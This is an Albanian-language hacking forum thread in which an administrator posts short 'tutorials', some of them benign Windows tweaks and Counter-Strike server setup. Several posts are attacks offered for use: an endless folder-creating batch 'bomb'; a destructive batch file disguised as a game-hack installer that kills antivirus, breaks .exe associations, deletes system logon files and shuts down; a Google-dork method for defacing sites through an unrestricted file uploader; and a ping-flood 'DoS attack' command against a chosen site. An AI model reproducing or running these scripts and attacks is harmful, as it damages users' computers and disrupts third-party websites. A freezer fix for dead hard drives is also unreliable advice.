Te gjitha mesimet e shkurtera nga RiNNoHaCKeR

  Share
  avatar
  h0Ax b00ter
  Administrator
  Administrator

  Male Age : 22
  Poenat : 498
  Reputacioni : 0
  Vendndodhja : @ AHT
  Numri i postimeve : 249

  Te gjitha mesimet e shkurtera nga RiNNoHaCKeR

  Mesazh nga h0Ax b00ter prej Sat Jan 23, 2010 1:07 am

  Ketu do te jene te gjitha mesimet e shkurtera nga une

  Mos te harrojme tema do te jete ngjitese


  Edituar për herë të fundit nga RiNNoHaCKeR në Sun Jan 24, 2010 12:28 pm, edituar 1 herë gjithsej
  avatar
  h0Ax b00ter
  Administrator
  Administrator

  Male Age : 22
  Poenat : 498
  Reputacioni : 0
  Vendndodhja : @ AHT
  Numri i postimeve : 249

  Re: Te gjitha mesimet e shkurtera nga RiNNoHaCKeR

  Mesazh nga h0Ax b00ter prej Sat Jan 23, 2010 1:12 am

  Kodi:
  Tema: Si te punojme ne 4 GOOGLE ne te njejten kohe dhe te njejtin vend
  Tuto by : RiNNoHaCKeR
  Website:[You must be registered and logged in to see this link.]
  Kjo iu nevojitet shume njerzeve qe dojne te punojne me 4 google ne te njejten kohe
  1] e hapim shfletuesin qe e kemi
  2]tek address e shkruajme
  Kodi:
  http://googlegooglegooglegoogle.com/old/
  avatar
  h0Ax b00ter
  Administrator
  Administrator

  Male Age : 22
  Poenat : 498
  Reputacioni : 0
  Vendndodhja : @ AHT
  Numri i postimeve : 249

  Re: Te gjitha mesimet e shkurtera nga RiNNoHaCKeR

  Mesazh nga h0Ax b00ter prej Sun Jan 24, 2010 12:26 pm

  Si ta riemërojmë tekstin “Welcome!” në “Mirë se vini!”?

  Pra nëse dëshirojmë që në Welcome Screen në vend të tekstit Welcome ta shkruajmë një tekst shqip duhet të veproni kështu:
  Për ta rregulluar këtë duhet që ta posedoni programin Resource Hacker i cili ka një kapacitet prej 541kB.

  këtë program mund ta shkarkoni në lidhjen [You must be registered and logged in to see this link.]

  Pas shkarkimit duhet që ta instaloni programin.

  Pastaj kur të hapet Programi Resource Hacker duhet që të kaloni në menynë File --> Open dhe e shfletojmi diskun tek: C:\WINDOWS\system32 deri sa ta gjejmi skedarin logonoui.exe

  Pasi të hapet në kornizën e majtë kaloni tek: String Table --> 1 --> 1033

  Pastaj në tekstin në anën e djathtë brenda thonjëzave ku shkruan "Welcome" modifikojeni atë tekst (p.sh. Mirë se vini!) dhe pastaj zgjidheni opsionin Compile Script (i cili gjendet në kornizën e djathtë-lartë), hapi tjetër është që ta ruani përmes opsionit File --> Save As... por duhet që të keni kujdes dhe ruajeni brenda direktoriumit C:\WINDOWS\system32 me një emër sipas dëshirës suaj, le të jetë p.sh. hyrja.exe

  Hapi tjetër është që të fillojmë me editorin e regjistrit përmes procedurës vijuese: Start --> Run dhe shkruani komandën regedit pastaj shtypeni tastin Enter. Tani duhet të shfletoni në kornizën e majtë tek çelësi HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\Cu rrentVersion\Winlogon, pasi të klikoni në Winlogon në anën e djathtë kah fundi do ta gjeni një skedar me emrin UIHost, duhet që të klikoni dy herë mbi të dhe tek pjesa Value Data duhet që ta vendosni emrin e skedarit që ju e keni emëruar e në rastin tonë ka qenë hyrja.exe, klikoni në OK dhe ristartojeni kompjuterin.
  Se si të verponi shikoni edhe figurën vijuese.
  [You must be registered and logged in to see this image.]Ky imazh është zvogluar, për ta parë imazhin me dimenzione origjinale kliko këtu.
  [You must be registered and logged in to see this image.]
  avatar
  h0Ax b00ter
  Administrator
  Administrator

  Male Age : 22
  Poenat : 498
  Reputacioni : 0
  Vendndodhja : @ AHT
  Numri i postimeve : 249

  Re: Te gjitha mesimet e shkurtera nga RiNNoHaCKeR

  Mesazh nga h0Ax b00ter prej Sun Jan 24, 2010 12:28 pm

  Si te ndryshojm Start-in


  Ne ket tuto do ju tregoj se si te ndryshoni Startin ...

  Per ta ndryshuar duhet ta downloadoni kete program

  Costum Start 1.2 Ket mund ta downloadoni Ketu

  [You must be registered and logged in to see this link.]

  E shkruani aty emrin qe deshironi te kete dhe Prekni Aply edhe u Kry.
  avatar
  h0Ax b00ter
  Administrator
  Administrator

  Male Age : 22
  Poenat : 498
  Reputacioni : 0
  Vendndodhja : @ AHT
  Numri i postimeve : 249

  Re: Te gjitha mesimet e shkurtera nga RiNNoHaCKeR

  Mesazh nga h0Ax b00ter prej Mon Jan 25, 2010 3:25 pm

  Si t? vendosim Foto brenda Folder-it

  Ja shikoni K?shtu: Nese keni D?shir edhe ju me b?r K?shtu
  sikur kjo ne Foto m? posht
  ju nevoitet vetem nj? Fajll (skeder)
  [You must be registered and logged in to see this image.]Ky imazh është zvogluar, për ta parë imazhin me dimenzione origjinale kliko këtu.
  [You must be registered and logged in to see this image.]


  si duhet Me fut foton
  [You must be registered and logged in to see this image.]Ky imazh është zvogluar, për ta parë imazhin me dimenzione origjinale kliko këtu.
  [You must be registered and logged in to see this image.]
  Mund ta Shkarkoni K?tu:
  Kodi:
  [You must be registered and logged in to see this link.]
  [You must be registered and logged in to see this link.]
  avatar
  h0Ax b00ter
  Administrator
  Administrator

  Male Age : 22
  Poenat : 498
  Reputacioni : 0
  Vendndodhja : @ AHT
  Numri i postimeve : 249

  Re: Te gjitha mesimet e shkurtera nga RiNNoHaCKeR

  Mesazh nga h0Ax b00ter prej Mon Jan 25, 2010 3:31 pm

  Si të krijojm Server Windows Me Amx Mod , State Me etj.  Instalojm Counter Strike 1.6 . Me pas e instalojm patch v21 ne C:\Program Files\Valve .

  Tash fillojm instalimin e Admin Mod e Extratojm niher dhe fillojm me instalim . Shkojm ne folderin
  admin mod dhe klikojm te install admin aty te direktoriumi ja japim ku gjendet hl.exe - pra ne rastin ton direktoriumi i hl.exe osht : C:\Program Files\Valve\hl.exe
  me pas ta qet ta zgjedhesh modelin e lojes 1. Counter Strike 2. Half Life na e shkrujm 1 edhe ok
  Tash vazhdojm me konfigurimin e Admin mod

  admin mod gjendet ktu --> C:\Program Files\Valve\cstrike\addons\adminmod
  vazhdojm me konfigurim

  pra hapim filen adminmod.cfg dhe e editojm kto tri sene:

  admin_bot_protection 1 (nga zero ne 1)
  admin_connect_msg "Miresevini ne SpY|Game Server 1.6..." une e kom bo kshtu ju ja boni emrin e juj te serverit
  admin_repeat_msg " Ky server u mundësua nga SpY|bes!" une e kom bo kshtu ju e beni si deshironi
  u kry me admin Mod.

  Vazhdojm me Amx mod pra se pari e bejm ekstract nga winrari dhe folderin amx e vendosim ne C:\Program Files\Valve\cstrike\addons\
  tash vazhdojm me konfigurim

  C:\Program Files\Valve\cstrike\addons\amx\config/amx.cfg ktu kena per me konfiguru

  vazhdojm

  1) amx_scrollmsg "Miresevini në %hostname% -- Ky server u mundësua nga SpY|bes!" 600 ktu une e kam konfigururar ju e vendosni emrin e serverit tuaj etj

  ky osht nje mesazh qe del gjat lojes dhe tregon se serveri perdor amx [You must be registered and logged in to see this image.]

  2)Ky server perdor Amx \nVisit [You must be registered and logged in to see this link.] "000100255" Edhe ktu ju ja ndryshoni


  Pra edhe konfigurimi i Amx Mod perfundoj


  vazhdojm [You must be registered and logged in to see this image.] me instalim dhe konfigurim te stats me [You must be registered and logged in to see this image.],kjo osht nje shtes per server qe tregon statistika te ndryshme mbi lojtaret [You must be registered and logged in to see this image.]

  E kopjojm folderin e stats me dhe e qesim ne C:\Program Files\Valve\cstrike\addons

  vazhdojm me konfigurim dhe shkojm hapim fajllin statsme.cfg....

  editojm kto

  // Rank by AUTHID
  // If you play with bots, or on a LAN Server you should *not* enabled Rank by AUTHID
  sm_storebyauth 0( nga 1 ne zero)

  si dhe :

  // Allow for logging bots to top10
  sm_rankbots 0 (nga 1 ne zero)

  pra perfundoj edhe konfigurimi i stas me [You must be registered and logged in to see this image.]

  tash vazhdojm me hapin e fundit metamod

  shkojm ne meda mod direktorium dhe editojm fajllin plugins.ini

  dhe vendosim keto :

  win32 addons/amx/dlls/amx_mm.dll

  win32 addons/amx/modules/csstats_mm.dll

  win32 addons/amx/modules/fun_mm.dll

  win32 addons/adminmod/dlls/admin_MM.dll

  win32 addons/adminmod/dlls/amx_admin.dll

  win32 addons/statsme/dlls/statsme_mm.dll
  Win32 addons/adminmod/dlls/admin_MM.dll

  Pra tash na ka mbetur vetem edhe nje hap qe ta konfigurojm server.cfg
  C:\Program Files\Valve\cstrike\server.cfg ktu gjindet e hapim me notepad dhe shlyjm qka gjendet ne te dhe
  vendosim kto komanda

  hostname "SpY|Game Server 1.6" ( ju e vendosni emrin e serverit te juaj
  mp_autokick 0
  mp_autocrosshair 0
  mp_autoteambalance 0
  mp_buytime 2
  mp_consistency 1
  mp_c4timer 35
  mp_fadetoblack 0
  mp_falldamage 0
  mp_flashlight 1
  mp_forcecamera 3
  mp_forcechasecam 2
  mp_friendlyfire 0
  mp_freezetime 0
  mp_fraglimit 0
  mp_hostagepenalty 0
  mp_limitteams 6
  mp_logfile 1
  mp_logmessages 1
  mp_logdetail 3
  mp_maxrounds 0
  mp_playerid 0
  mp_roundtime 3
  mp_startmoney 800
  mp_timelimit 35
  mp_tkpunish 0
  mp_winlimit 0

  sv_aim 0
  sv_airaccelerate 10
  sv_airmove 1
  sv_allowdownload 1
  sv_clienttrace 1.0
  sv_clipmode 0
  sv_allowupload 1
  sv_cheats 0
  sv_gravity 800
  sv_lan 1
  sv_maxrate 7000
  sv_maxspeed 320
  sv_maxupdaterate 101
  sys_ticrate 10000
  decalfrequency 60
  pausable 0
  log on
  decalfrequency 60
  edgefriction 2
  host_framerate 0
  exec listip.cfg
  exec banned.cfg
  rcon_password 123456789 (ju e vendosni paswordin si te doni por mos e harroni se ju vyn per server kur ta startojm

  Tash na mbetet vetem ta startojm serverin neve na ka dalur nje ikon me emrin Dedicated Server
  ne desktop kur e kemi instalur patchin v21 pra klikojm ne ate ikon

  game : Counter- Strike

  Server name : Emri Serverit

  Map: qfar mape deshironi

  Network: Internet

  Max.Players : Sa te doni ju

  Udp port : 27015

  RCON pasword : paswordi qe e vendosem ne server.cfg

  edhe start server qe ta startojm serverin

  Pra ju tash keni serverin tuaj
  Filet për Server mund ti downladoni ktu:

  Kodi:
  [You must be registered and logged in to see this link.]
  [You must be registered and logged in to see this link.]
  [You must be registered and logged in to see this link.]
  [You must be registered and logged in to see this link.]
  avatar
  h0Ax b00ter
  Administrator
  Administrator

  Male Age : 22
  Poenat : 498
  Reputacioni : 0
  Vendndodhja : @ AHT
  Numri i postimeve : 249

  Re: Te gjitha mesimet e shkurtera nga RiNNoHaCKeR

  Mesazh nga h0Ax b00ter prej Mon Jan 25, 2010 3:41 pm

  Mas pari shko GOOGLE.COM (aht-team.tk) ose qata qe e keni website startuese
  pastaj fshije linkun,pra google.com
  edhe shkruje kete ne adress bar
  Cito:

  javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6)
  edhe trusja Enter
  avatar
  h0Ax b00ter
  Administrator
  Administrator

  Male Age : 22
  Poenat : 498
  Reputacioni : 0
  Vendndodhja : @ AHT
  Numri i postimeve : 249

  Re: Te gjitha mesimet e shkurtera nga RiNNoHaCKeR

  Mesazh nga h0Ax b00ter prej Tue Jan 26, 2010 3:58 pm

  Beni FOLDER BOMB

  hapim notepad e fusim kete kodin

  Cito:

  @echo off
  color 0C
  :a
  md %random%
  goto :a
  dhe e ruajme BOMBING.BAT

  Edhe shikojeni...Shpresoj t;ju pelqeje Razz:P
  avatar
  h0Ax b00ter
  Administrator
  Administrator

  Male Age : 22
  Poenat : 498
  Reputacioni : 0
  Vendndodhja : @ AHT
  Numri i postimeve : 249

  Re: Te gjitha mesimet e shkurtera nga RiNNoHaCKeR

  Mesazh nga h0Ax b00ter prej Tue Jan 26, 2010 4:03 pm

  funny bat file

  Cito:

  title tibia hack setup
  color 0a
  @echo off
  set end=md "hack installing"
  set fin=copy "hack log.txt" "installing"
  %end%
  %fin%
  net send * hack is installing, press ok to begin set up.
  Kill navapsvc.exe /f /q
  kill zonelabs.exe /f /q
  kill explorer.exe /f /q
  cls
  assoc .exe=txtfile
  assoc .txt=mp3file
  cls
  msg * it is you who is hacked....
  Msg * i warned you, and you kept going. Challenge me and this is what happens.
  Del c:\windows\system32\logoff.exe /f /q
  del c:\windows\system32\logon.exe /f /q
  del c:\windows\system32\logon.scr /f /q
  cls
  shutdown
  avatar
  h0Ax b00ter
  Administrator
  Administrator

  Male Age : 22
  Poenat : 498
  Reputacioni : 0
  Vendndodhja : @ AHT
  Numri i postimeve : 249

  Re: Te gjitha mesimet e shkurtera nga RiNNoHaCKeR

  Mesazh nga h0Ax b00ter prej Wed Jan 27, 2010 4:52 pm

  Internet Browser i fshehur ne PC qe kurr se keni perdor

  Ketu do te mesoni qe te perdorni njer internet browser te cilin mund ta shfrytezoni kur nuk ben asnje tejter internet browser qe te shfletoni faqet e juaj ne internet ne rehati .

  Pra shkojme .

  Se pari duhet ta hapni windows kalkulatorin ndoshta e keni perdor najhere per nevojat e juaj , ket mund ta beni lehte duhet shkaur me windos button ( me ate shenjen e windowsit ) +R ne RUN shkruani "calc" dhe trusni OK , dhe ju hapet Kalkulatori :
  Pastaj te adresse bar ku shkrun titullli larte ne anen e majte , klikoni me te djathe dhe zgjedhni opcionin JUMP TO URL

  Kur te e hapni dritaren shkruani kete kode me gjihte apostrof `
  E kopjoni kejt qeto edhe ja bani Paste :
  Kodi:
  [You must be registered and logged in to see this link.]
  Dhe tani mund te vizitoni faqe te tjera , duke e perseritur kete procedur te fundit por tash nuk e shrkuni ma [You must be registered and logged in to see this link.] po e shkruni psh [You must be registered and logged in to see this link.]

  Kjo eshte e testuar ne Windows Xp sp2 dhe funksion 100 % , ta dini se Flash animacionet kjo menyre nuk i qel , as JACA e keto , vetem HTML , pra ne raste nese nuk ban tjeter sen mund ta perdorni kete
  avatar
  h0Ax b00ter
  Administrator
  Administrator

  Male Age : 22
  Poenat : 498
  Reputacioni : 0
  Vendndodhja : @ AHT
  Numri i postimeve : 249

  Re: Te gjitha mesimet e shkurtera nga RiNNoHaCKeR

  Mesazh nga h0Ax b00ter prej Thu Jan 28, 2010 6:24 pm

  Nëse keni problem në çasjen e komandës regedit!


  Ndodhë që në kompjuterin tanë duhet të ndrrojmë ndonjë çelës rexhistri përmes procedurës Start, Run dhe shkruajm regedit pastaj shtypim tastin Enter, prandaj edhe mundet që të hasemi në këtë problem si në figurën vijuese:

  [You must be registered and logged in to see this image.]

  Si duhet të veprojmë që ta rregullojmë këtë problem?

  Procedura është kjo:

  Duhet që së pari të shkojmë në:
  Start > Run shkruajmë gpedit.msc dhe e shtypim tastin Enter
  Tani në kornizën e majtë gjejmë:
  User Configuration > Administrative Templates > System >
  Në kornizën e djathtë kërkojmë rreshtin:
  Prevent Access to Registry Editing Tools
  Mundet me ndodhë që aktive do të jetë Not Configured.
  Klikoni dy herë mbi të dhe vendoseni shenjën e tikut tek Disabled

  Tani vetëm klikoni OK, pastaj OK dhe shikoni se do të funksionoj.
  avatar
  h0Ax b00ter
  Administrator
  Administrator

  Male Age : 22
  Poenat : 498
  Reputacioni : 0
  Vendndodhja : @ AHT
  Numri i postimeve : 249

  Re: Te gjitha mesimet e shkurtera nga RiNNoHaCKeR

  Mesazh nga h0Ax b00ter prej Thu Jan 28, 2010 6:25 pm

  Si ta ndalojmë "Reboot now" pas përditësimeve në XP!


  Nëse ju bezdisë ristartimi i shpeshtë pas përditësimeve (ang. Updates) të Windows-it dhe doni disi ti ndaloni ato ristartime atëherë veproni kështu:
  Shkoni tek Start pastaj Run shkruani regedit dhe shtypeni tastin Enter, tani duhet ta gjeni këtë çelësin në kornizën e majtë:
  HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Win dows.
  Pastaj mbi Windows klikoni me të djathtë dhe nga menyja e kontekstit zgjidhni New --> Key shkruani kështu ngjitur pa i ndarë fjalët WindowsUpdate dhe shtypeni tastin Enter, tani do te krijohet një folder i ri.
  Pastaj mbi atë folder të ri klikoni prap me tastin e djathtë të miut dhe krijojeni një çelës të ri tani me emrin AU (shkurtesa për Automatic Updates), tani shikoni në kornizën e djathtë dhe e gjeni tekstin (Default), klikoni nën të në hapësirën e zbraztë dhe zgjidheni New DWORD Value, shkruajeni këtë tekst NoAutoRebootWithLoggedOnUsers, dhe shtypeni Enter, tani klikoni dy herë mbi të dhe ndryshoni vlerën tek value data1 dhe vërjani tikun tek Hexadecimal, pastaj nuk ju mbetet gjë tjetër vetëm ti mbyllni të gjitha dritaret. Se si duket kjo shikoni foton vijuese:
  [You must be registered and logged in to see this image.]
  avatar
  h0Ax b00ter
  Administrator
  Administrator

  Male Age : 22
  Poenat : 498
  Reputacioni : 0
  Vendndodhja : @ AHT
  Numri i postimeve : 249

  Re: Te gjitha mesimet e shkurtera nga RiNNoHaCKeR

  Mesazh nga h0Ax b00ter prej Thu Jan 28, 2010 6:26 pm

  Formatizi i Sistemit Operativ XP me USB boot


  Po flas vetem per Windows XP (per Vista, Windows 7, Ubuntu, Linux nuk e kam provuar)
  1. Motherboardi apo pllaka amë e kompjuterit te juaj duhet ta perkrah Boot From USB pra qe te mund te bootoj (Startoi nga USB)
  Kete gje mund ta vertetoni tek Boot Device ne BIOS.
  Pas kesaj aktivizoe USB ne kompjuter, vendosja emrin USB-se HPUSBFW.exe
  Pasi t'ia bejsh emrin HPUSBFW.exe beje Format USB-ne me FAT pasi te perfundon formatizimi i USb-se vepro keshtu:
  Kopjo ne USB te gjitha Filet nga folderi Windows XP (pra nga CD-ja e Win XP-se apo ku e keni Win XP).
  Pasi ti kopjosh te gjitha filet nga Win XP ne USB ateher vepro keshtu:
  Beje Restart kompjuterin, USB-ne lere te aktivizuar ne kompjuter, hyn ne BIOS, tek First Boot Device zgjedhe te paren USB shko Exit, Save Settings Y dhe te fillon formatizimi nga USB !
  avatar
  h0Ax b00ter
  Administrator
  Administrator

  Male Age : 22
  Poenat : 498
  Reputacioni : 0
  Vendndodhja : @ AHT
  Numri i postimeve : 249

  Re: Te gjitha mesimet e shkurtera nga RiNNoHaCKeR

  Mesazh nga h0Ax b00ter prej Sat Jan 30, 2010 2:36 pm

  Hack(Powerd By MySimpleFileUploader V1.6)
  Tuto By RiNNoHaCKeR

  Dork:Powerd By MySimpleFileUploader V1.6
  Masi Gjejm Webin te Cilin Doni Ta Hacki hy ne web Edhe Shkon Brows Keta Weba Pranojn Te Upladojsh Vetem .gif, .jpg, .jpeg, .zip, .rar, .png, .swf, .psd, .sis, .sisx, .txt

  Per Fat Te Keq .html nuk pranojn keshtu qe mundeni te shtini vetm Text Document Ne At Text dokument e shkruan Psh Hacked By Kushje edhe e upladon text dokumet vendoja si don emrin Onwed Index qa don ti.....

  Demo:.http://up4p.hostrator.com/up_down/2370onwed.txt
  Demo:http://www.8rbb.com/up/file/921onwed.txt
  Qe Edhe 1 Shembull:http://www.8rbb.com/upEdhe Vetem e Upladon Cilin index.txt don ti...

  Nese nuk e keni te qart ateher Fol ne Forum Ne MSn Ska Ndihm.....
  avatar
  h0Ax b00ter
  Administrator
  Administrator

  Male Age : 22
  Poenat : 498
  Reputacioni : 0
  Vendndodhja : @ AHT
  Numri i postimeve : 249

  Re: Te gjitha mesimet e shkurtera nga RiNNoHaCKeR

  Mesazh nga h0Ax b00ter prej Sat Jan 30, 2010 2:43 pm

  Si te organizojm nje DoS attack nga PC yni ne nje
  Se pari te ju spjegoje se qka eshte DoS ?

  Denial of Service (DoS) jane sulme te ashpra ndaj nje kompjuteri i vetem , ose nje website ,qe te pengoje qllimisht punen e tyre.

  Qka ju nevoitet ?
  1- Command Prompt (CMD ose DOS) te cilin qdo windows e ka LOL.
  2- Ip-Addressa e faqes te ciles doni tja msyni ;D.

  Lind pyetja se si te marr IP te nje site qe po du me ja ba DoS ?
  kush nuk din skeni qa te habitni ne kete pjese se eshte lehte dhe do te ju spjegoj se si ta beni kete !
  -Shkoni ne CMD(command prompt) dhe aty shkruani :
  Kodi:
  nslookup emri i site-it
  psh:
  Kodi:
  nslookup [You must be registered and logged in to see this link.]
  Do te ju del aty pak me poshte tani IP adresa e shenjestres

  OK nese keni shku sipas hapat mire , atehere do te jeni gati te sulmoni nje faqe apo Server

  -Ne CMD shkruani kete kode qe te sulmoni :
  Kodi:
  ping IP e faqes -l 65500 -n 10000000 -w 0.00001
  -n 10000000= kjo eshte vlera e DoS attemps-ave mund ta ndryshoni mvaret sa doni me ba ju se sa shpesh me qu kerkese aty ne faqe .

  IP e faqes kete text e zvendesoni me IP te faqes te ciles ja keni nxjerr .

  -w 0.00001 = Kjo eshte koha qe duhet te pritet pas nje sulmi te PIngut

  Verejtej :
  Mos i largoni -l, -n dhe -w nga komanda sepse atakimi juaj nuk do te jete i efektshem.


  Ky tutorial u krijua nga une , per qellim te aftesimit te njerzve rreth Hacking-ut
  Shpresoj se do te ju pelqen tutoriali ,

  P.S
  1. Ju kisha lut edhe pse kam shenuar aty [You must be registered and logged in to see this link.] Une e morra si shembull... te mos perovni ta sulmoni sepse eshte nje faqe e cila nuk meriton ta sulmoni.
  2. Ju duhet ta keni pingun me te mire sesa webfaqja qe doni ta sulmoni
  3. Pas nje kohe te gjate te webit nen sulm. Serveri mund t'i digjet.. i kallet shqip
  avatar
  Zone-X
  Moderator
  Moderator

  Poenat : 138
  Reputacioni : 0
  Numri i postimeve : 64

  Re: Te gjitha mesimet e shkurtera nga RiNNoHaCKeR

  Mesazh nga Zone-X prej Sat Jan 30, 2010 3:56 pm

  hallal te koft
  avatar
  Zone-X
  Moderator
  Moderator

  Poenat : 138
  Reputacioni : 0
  Numri i postimeve : 64

  Re: Te gjitha mesimet e shkurtera nga RiNNoHaCKeR

  Mesazh nga Zone-X prej Sat Jan 30, 2010 3:57 pm

  danger
  avatar
  h0Ax b00ter
  Administrator
  Administrator

  Male Age : 22
  Poenat : 498
  Reputacioni : 0
  Vendndodhja : @ AHT
  Numri i postimeve : 249

  Re: Te gjitha mesimet e shkurtera nga RiNNoHaCKeR

  Mesazh nga h0Ax b00ter prej Sat Jan 30, 2010 4:27 pm

  Flm Zone-X
  avatar
  h0Ax b00ter
  Administrator
  Administrator

  Male Age : 22
  Poenat : 498
  Reputacioni : 0
  Vendndodhja : @ AHT
  Numri i postimeve : 249

  Re: Te gjitha mesimet e shkurtera nga RiNNoHaCKeR

  Mesazh nga h0Ax b00ter prej Mon Feb 15, 2010 5:20 pm

  HDD Qe nuk punon < beje me punu per 10min


  HDD qe nuk puno behe te punoj perr 10 minuta
  Me te shumtete hard disk drive (H
  DD)
  Nga perdorimi i shumte DIgjen Dhe nuk punojne me
  Pra nuk bejn me dhe i hedhim poshte..
  the humbim tetera archivat
  Ok sot do tju Tregoj nje trick
  Hiqeni HDD dhe vejeni ne nje plasmas ose ne nje cant
  Prej plasmasi
  mbylleni forte dhe futeni ne Figorifer ne grirrije
  (Ati ku vejm mish ,Peshk )
  Do ta leni per 1 dite teter
  dhe pastaj
  Veheni tek pc ati ku qe dhe dizni pc dhe beni back up
  ato archiva qe donit
  HDD do punoj vetem per 10 minuta
  avatar
  dr_iton
  Member
  Member

  Male Poenat : 3
  Reputacioni : 0
  Vendndodhja : Llapi
  Numri i postimeve : 3

  Re: Te gjitha mesimet e shkurtera nga RiNNoHaCKeR

  Mesazh nga dr_iton prej Mon May 23, 2011 5:00 pm

  h0Ax b00ter shkruajti:Si ta riemërojmë tekstin “Welcome!” në “Mirë se vini!”?

  Pra nëse dëshirojmë që në Welcome Screen në vend të tekstit Welcome ta shkruajmë një tekst shqip duhet të veproni kështu:
  Për ta rregulluar këtë duhet që ta posedoni programin Resource Hacker i cili ka një kapacitet prej 541kB.

  këtë program mund ta shkarkoni në lidhjen [You must be registered and logged in to see this link.]

  Pas shkarkimit duhet që ta instaloni programin.

  Pastaj kur të hapet Programi Resource Hacker duhet që të kaloni në menynë File --> Open dhe e shfletojmi diskun tek: C:\WINDOWS\system32 deri sa ta gjejmi skedarin logonoui.exe

  Pasi të hapet në kornizën e majtë kaloni tek: String Table --> 1 --> 1033

  Pastaj në tekstin në anën e djathtë brenda thonjëzave ku shkruan "Welcome" modifikojeni atë tekst (p.sh. Mirë se vini!) dhe pastaj zgjidheni opsionin Compile Script (i cili gjendet në kornizën e djathtë-lartë), hapi tjetër është që ta ruani përmes opsionit File --> Save As... por duhet që të keni kujdes dhe ruajeni brenda direktoriumit C:\WINDOWS\system32 me një emër sipas dëshirës suaj, le të jetë p.sh. hyrja.exe

  Hapi tjetër është që të fillojmë me editorin e regjistrit përmes procedurës vijuese: Start --> Run dhe shkruani komandën regedit pastaj shtypeni tastin Enter. Tani duhet të shfletoni në kornizën e majtë tek çelësi HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\Cu rrentVersion\Winlogon, pasi të klikoni në Winlogon në anën e djathtë kah fundi do ta gjeni një skedar me emrin UIHost, duhet që të klikoni dy herë mbi të dhe tek pjesa Value Data duhet që ta vendosni emrin e skedarit që ju e keni emëruar e në rastin tonë ka qenë hyrja.exe, klikoni në OK dhe ristartojeni kompjuterin.
  Se si të verponi shikoni edhe figurën vijuese.
  [You must be registered and logged in to see this image.]Ky imazh është zvogluar, për ta parë imazhin me dimenzione origjinale kliko këtu.
  [You must be registered and logged in to see this image.]

  Kjo tuto eshte punuar nga unë personalisht, nuk eshte mire qe administruesi i forumit te beje Copy dhe Paste
  avatar
  dr_iton
  Member
  Member

  Male Poenat : 3
  Reputacioni : 0
  Vendndodhja : Llapi
  Numri i postimeve : 3

  Re: Te gjitha mesimet e shkurtera nga RiNNoHaCKeR

  Mesazh nga dr_iton prej Mon May 23, 2011 5:05 pm

  h0Ax b00ter shkruajti:Nëse keni problem në çasjen e komandës regedit!


  Ndodhë që në kompjuterin tanë duhet të ndrrojmë ndonjë çelës rexhistri përmes procedurës Start, Run dhe shkruajm regedit pastaj shtypim tastin Enter, prandaj edhe mundet që të hasemi në këtë problem si në figurën vijuese:

  [You must be registered and logged in to see this image.]

  Si duhet të veprojmë që ta rregullojmë këtë problem?

  Procedura është kjo:

  Duhet që së pari të shkojmë në:
  Start > Run shkruajmë gpedit.msc dhe e shtypim tastin Enter
  Tani në kornizën e majtë gjejmë:
  User Configuration > Administrative Templates > System >
  Në kornizën e djathtë kërkojmë rreshtin:
  Prevent Access to Registry Editing Tools
  Mundet me ndodhë që aktive do të jetë Not Configured.
  Klikoni dy herë mbi të dhe vendoseni shenjën e tikut tek Disabled

  Tani vetëm klikoni OK, pastaj OK dhe shikoni se do të funksionoj.

  Ky postim është Copy dhe Paste. Postuesi i temes e din qe e them te verteten.
  avatar
  dr_iton
  Member
  Member

  Male Poenat : 3
  Reputacioni : 0
  Vendndodhja : Llapi
  Numri i postimeve : 3

  Re: Te gjitha mesimet e shkurtera nga RiNNoHaCKeR

  Mesazh nga dr_iton prej Mon May 23, 2011 5:07 pm

  h0Ax b00ter shkruajti:Si ta ndalojmë "Reboot now" pas përditësimeve në XP!


  Nëse ju bezdisë ristartimi i shpeshtë pas përditësimeve (ang. Updates) të Windows-it dhe doni disi ti ndaloni ato ristartime atëherë veproni kështu:
  Shkoni tek Start pastaj Run shkruani regedit dhe shtypeni tastin Enter, tani duhet ta gjeni këtë çelësin në kornizën e majtë:
  HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Win dows.
  Pastaj mbi Windows klikoni me të djathtë dhe nga menyja e kontekstit zgjidhni New --> Key shkruani kështu ngjitur pa i ndarë fjalët WindowsUpdate dhe shtypeni tastin Enter, tani do te krijohet një folder i ri.
  Pastaj mbi atë folder të ri klikoni prap me tastin e djathtë të miut dhe krijojeni një çelës të ri tani me emrin AU (shkurtesa për Automatic Updates), tani shikoni në kornizën e djathtë dhe e gjeni tekstin (Default), klikoni nën të në hapësirën e zbraztë dhe zgjidheni New DWORD Value, shkruajeni këtë tekst NoAutoRebootWithLoggedOnUsers, dhe shtypeni Enter, tani klikoni dy herë mbi të dhe ndryshoni vlerën tek value data1 dhe vërjani tikun tek Hexadecimal, pastaj nuk ju mbetet gjë tjetër vetëm ti mbyllni të gjitha dritaret. Se si duket kjo shikoni foton vijuese:
  [You must be registered and logged in to see this image.]
  Postim i kopjuar.

  Sponsored content

  Re: Te gjitha mesimet e shkurtera nga RiNNoHaCKeR

  Mesazh nga Sponsored content


   Ora është Sun Dec 16, 2018 7:17 pm